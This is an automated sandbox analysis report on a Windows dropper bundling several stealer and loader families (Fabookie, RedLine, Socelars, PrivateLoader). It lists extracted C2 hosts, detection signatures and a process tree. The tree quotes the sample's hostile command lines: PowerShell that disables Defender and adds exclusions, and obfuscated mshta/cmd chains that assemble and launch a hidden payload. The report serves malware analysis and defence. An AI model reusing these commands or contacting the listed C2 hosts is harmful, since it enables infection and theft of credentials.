fabookie | ffe21af6accb27ecee7c5fae57211ff9f545e64b680059b4037596288c63920b

Analysis

max time kernel
68s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-01-2025 22:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_installer.exe
Size

4.3MB
MD5

c12fe256228c8c0403ef35279aca6f58
SHA1

840a4eaf832f3cd154f0766dbc415a32c181e200
SHA256

86271c0587581b77766414a1238238011c10a5a06255b4611ac3b058f4529c2b
SHA512

88689761f0eeedc4ff633744dab15b26ad7352bda1f0329ed920dce463118ea11a14249cfd636aa3d39dbdabbcb1342138b7b5255a3791faf8ad955c63f5ff11
SSDEEP

98304:xRCvLUBsgElXqpZspVj14x8YkF1SUBBrttz1hNOtlVYgb:x6LUCgEBqpZFO9PttzM/h

Score

10^/10

fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

privateloader

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

Extracted

Family

nullmixer

http://marianu.xyz/

Extracted

Family

redline

Botnet

ChrisNEW

194.104.136.5:46013

Attributes

auth_value
9491a1c5e11eb6097e68a4fa8627fda8

Extracted

Family

gcleaner

gcl-gb.biz

45.9.20.13

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral4/files/0x0007000000023cca-72.dat	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Fabookie family
fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
Nullmixer family
nullmixer
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Onlylogger family
onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Privateloader family
privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral4/memory/3952-267-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Redline family
redline
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars
Socelars family
socelars

Socelars payload 1 IoCs

resource	yara_rule
behavioral4/files/0x0007000000023cce-78.dat	family_socelars

OnlyLogger payload 2 IoCs

resource	yara_rule
behavioral4/memory/1068-287-0x0000000000400000-0x000000000089C000-memory.dmp	family_onlylogger
behavioral4/memory/1068-315-0x0000000000400000-0x000000000089C000-memory.dmp	family_onlylogger

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2084	powershell.exe
1104	powershell.exe

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral4/files/0x0007000000023cc2-46.dat	aspack_v212_v242
behavioral4/files/0x0007000000023cc4-53.dat	aspack_v212_v242
behavioral4/files/0x0007000000023cc1-49.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Sat142b09ae40c44cf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	JYCWewAX2vPOJ.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Sat1481f5a7e3eccdd.tmp

Executes dropped EXE 19 IoCs

pid	Process
2040	setup_install.exe
3928	Sat14a7594cc5a0116.exe
1032	Sat1481f5a7e3eccdd.exe
1836	Sat1427fbafcf251.exe
8	Sat14b47e86b9c16b.exe
5072	Sat1487ca754e680f91.exe
4328	Sat142ac5249376e895.exe
1068	Sat14febbc433.exe
616	Sat14d32a38896785b13.exe
3712	Sat14514904a4b.exe
4824	Sat14f1396dfcf191bd.exe
5068	Sat142b09ae40c44cf.exe
1872	Sat144474a564d26f29.exe
1036	Sat1481f5a7e3eccdd.tmp
2536	Sat1481f5a7e3eccdd.exe
2780	Sat1481f5a7e3eccdd.tmp
2380	Sat1427fbafcf251.exe
1036	JYCWewAX2vPOJ.EXE
3952	Sat1427fbafcf251.exe

Loads dropped DLL 10 IoCs

pid	Process
2040	setup_install.exe
2040	setup_install.exe
2040	setup_install.exe
2040	setup_install.exe
2040	setup_install.exe
2040	setup_install.exe
1036	Sat1481f5a7e3eccdd.tmp
2780	Sat1481f5a7e3eccdd.tmp
4788	msiexec.exe
4788	msiexec.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 1 IoCs

flow	pid	Process
117	4788	msiexec.exe

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json	Sat14b47e86b9c16b.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
74	pastebin.com
75	pastebin.com
15	iplogger.org
16	iplogger.org
26	iplogger.org
29	iplogger.org
73	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1836 set thread context of 3952	1836	Sat1427fbafcf251.exe	136

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
3620	2040	WerFault.exe	85
1144	1068	WerFault.exe
5048	3928	WerFault.exe
3064	1068	WerFault.exe	113
1616	1068	WerFault.exe	113
2724	1068	WerFault.exe	113
4848	1068	WerFault.exe	113
2360	1068	WerFault.exe	113
3604	1068	WerFault.exe	113
4168	1068	WerFault.exe	113
4828	1068	WerFault.exe	113
1336	1068	WerFault.exe	113
5396	1068	WerFault.exe	113
1020	1068	WerFault.exe	113

System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat142ac5249376e895.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat1481f5a7e3eccdd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat1427fbafcf251.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat1481f5a7e3eccdd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JYCWewAX2vPOJ.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat14febbc433.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat142b09ae40c44cf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat1481f5a7e3eccdd.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat14a7594cc5a0116.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat1487ca754e680f91.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat14b47e86b9c16b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat1427fbafcf251.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat144474a564d26f29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sat1481f5a7e3eccdd.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat14a7594cc5a0116.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
664	taskkill.exe
1644	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133806768185447323"	chrome.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1104	powershell.exe
1104	powershell.exe
2084	powershell.exe
2084	powershell.exe
1104	powershell.exe
2084	powershell.exe
4420	chrome.exe
4420	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeCreateTokenPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeAssignPrimaryTokenPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeLockMemoryPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeIncreaseQuotaPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeMachineAccountPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeTcbPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeSecurityPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeTakeOwnershipPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeLoadDriverPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeSystemProfilePrivilege	8	Sat14b47e86b9c16b.exe
Token: SeSystemtimePrivilege	8	Sat14b47e86b9c16b.exe
Token: SeProfSingleProcessPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeIncBasePriorityPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeCreatePagefilePrivilege	8	Sat14b47e86b9c16b.exe
Token: SeCreatePermanentPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeBackupPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeRestorePrivilege	8	Sat14b47e86b9c16b.exe
Token: SeShutdownPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeDebugPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeAuditPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeSystemEnvironmentPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeChangeNotifyPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeRemoteShutdownPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeUndockPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeSyncAgentPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeEnableDelegationPrivilege	8	Sat14b47e86b9c16b.exe
Token: SeManageVolumePrivilege	8	Sat14b47e86b9c16b.exe
Token: SeImpersonatePrivilege	8	Sat14b47e86b9c16b.exe
Token: SeCreateGlobalPrivilege	8	Sat14b47e86b9c16b.exe
Token: 31	8	Sat14b47e86b9c16b.exe
Token: 32	8	Sat14b47e86b9c16b.exe
Token: 33	8	Sat14b47e86b9c16b.exe
Token: 34	8	Sat14b47e86b9c16b.exe
Token: 35	8	Sat14b47e86b9c16b.exe
Token: SeDebugPrivilege	616	Sat14d32a38896785b13.exe
Token: SeDebugPrivilege	4824	Sat14f1396dfcf191bd.exe
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe
Token: SeShutdownPrivilege	4420	chrome.exe
Token: SeCreatePagefilePrivilege	4420	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe
4420	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4832 wrote to memory of 2040	4832	setup_installer.exe	85
PID 4832 wrote to memory of 2040	4832	setup_installer.exe	85
PID 4832 wrote to memory of 2040	4832	setup_installer.exe	85
PID 2040 wrote to memory of 3888	2040	setup_install.exe	88
PID 2040 wrote to memory of 3888	2040	setup_install.exe	88
PID 2040 wrote to memory of 3888	2040	setup_install.exe	88
PID 2040 wrote to memory of 2988	2040	setup_install.exe	89
PID 2040 wrote to memory of 2988	2040	setup_install.exe	89
PID 2040 wrote to memory of 2988	2040	setup_install.exe	89
PID 3888 wrote to memory of 1104	3888	cmd.exe	90
PID 3888 wrote to memory of 1104	3888	cmd.exe	90
PID 3888 wrote to memory of 1104	3888	cmd.exe	90
PID 2988 wrote to memory of 2084	2988	cmd.exe	91
PID 2988 wrote to memory of 2084	2988	cmd.exe	91
PID 2988 wrote to memory of 2084	2988	cmd.exe	91
PID 2040 wrote to memory of 2176	2040	setup_install.exe	92
PID 2040 wrote to memory of 2176	2040	setup_install.exe	92
PID 2040 wrote to memory of 2176	2040	setup_install.exe	92
PID 2040 wrote to memory of 3988	2040	setup_install.exe	170
PID 2040 wrote to memory of 3988	2040	setup_install.exe	170
PID 2040 wrote to memory of 3988	2040	setup_install.exe	170
PID 2040 wrote to memory of 1328	2040	setup_install.exe	94
PID 2040 wrote to memory of 1328	2040	setup_install.exe	94
PID 2040 wrote to memory of 1328	2040	setup_install.exe	94
PID 2040 wrote to memory of 2952	2040	setup_install.exe	95
PID 2040 wrote to memory of 2952	2040	setup_install.exe	95
PID 2040 wrote to memory of 2952	2040	setup_install.exe	95
PID 2040 wrote to memory of 4676	2040	setup_install.exe	96
PID 2040 wrote to memory of 4676	2040	setup_install.exe	96
PID 2040 wrote to memory of 4676	2040	setup_install.exe	96
PID 2040 wrote to memory of 4604	2040	setup_install.exe	97
PID 2040 wrote to memory of 4604	2040	setup_install.exe	97
PID 2040 wrote to memory of 4604	2040	setup_install.exe	97
PID 2040 wrote to memory of 400	2040	setup_install.exe	98
PID 2040 wrote to memory of 400	2040	setup_install.exe	98
PID 2040 wrote to memory of 400	2040	setup_install.exe	98
PID 2040 wrote to memory of 1856	2040	setup_install.exe	99
PID 2040 wrote to memory of 1856	2040	setup_install.exe	99
PID 2040 wrote to memory of 1856	2040	setup_install.exe	99
PID 2040 wrote to memory of 2584	2040	setup_install.exe	100
PID 2040 wrote to memory of 2584	2040	setup_install.exe	100
PID 2040 wrote to memory of 2584	2040	setup_install.exe	100
PID 2040 wrote to memory of 4168	2040	setup_install.exe	169
PID 2040 wrote to memory of 4168	2040	setup_install.exe	169
PID 2040 wrote to memory of 4168	2040	setup_install.exe	169
PID 2040 wrote to memory of 740	2040	setup_install.exe	102
PID 2040 wrote to memory of 740	2040	setup_install.exe	102
PID 2040 wrote to memory of 740	2040	setup_install.exe	102
PID 2040 wrote to memory of 4944	2040	setup_install.exe	103
PID 2040 wrote to memory of 4944	2040	setup_install.exe	103
PID 2040 wrote to memory of 4944	2040	setup_install.exe	103
PID 4944 wrote to memory of 3928	4944	cmd.exe	106
PID 4944 wrote to memory of 3928	4944	cmd.exe	106
PID 4944 wrote to memory of 3928	4944	cmd.exe	106
PID 1856 wrote to memory of 1872	1856	cmd.exe	107
PID 1856 wrote to memory of 1872	1856	cmd.exe	107
PID 1856 wrote to memory of 1872	1856	cmd.exe	107
PID 740 wrote to memory of 1032	740	cmd.exe	108
PID 740 wrote to memory of 1032	740	cmd.exe	108
PID 740 wrote to memory of 1032	740	cmd.exe	108
PID 4168 wrote to memory of 1836	4168	cmd.exe	109
PID 4168 wrote to memory of 1836	4168	cmd.exe	109
PID 4168 wrote to memory of 1836	4168	cmd.exe	109
PID 2584 wrote to memory of 8	2584	cmd.exe	174

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4832
- C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3888
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2176
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat14f1396dfcf191bd.exe
      Sat14f1396dfcf191bd.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3988
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat142b09ae40c44cf.exe
      Sat142b09ae40c44cf.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5068
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject( "wscRiPT.sHELl" ). rUN( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY &If """" =="""" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3896
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY &If "" =="" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat142b09ae40c44cf.exe") do taskkill -iM "%~NXf" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE
        
        JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1036
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject( "wscRiPT.sHELl" ). rUN( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY &If ""/p~P_UpSUZjMkOKsY "" =="""" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3508
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY &If "/p~P_UpSUZjMkOKsY " =="" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE") do taskkill -iM "%~NXf" /f
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4892
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCriPT:CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run("CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q+ 9h1gI_nY.T+ 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE) )
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1020
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk>1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 +lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q+9h1gI_nY.T+ 1HSQZ.62D 2KSA.Gf7 &STaRT msiexec -y .\2KSA.GF7
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3064
        
        C:\Windows\SysWOW64\cmd.exe
        
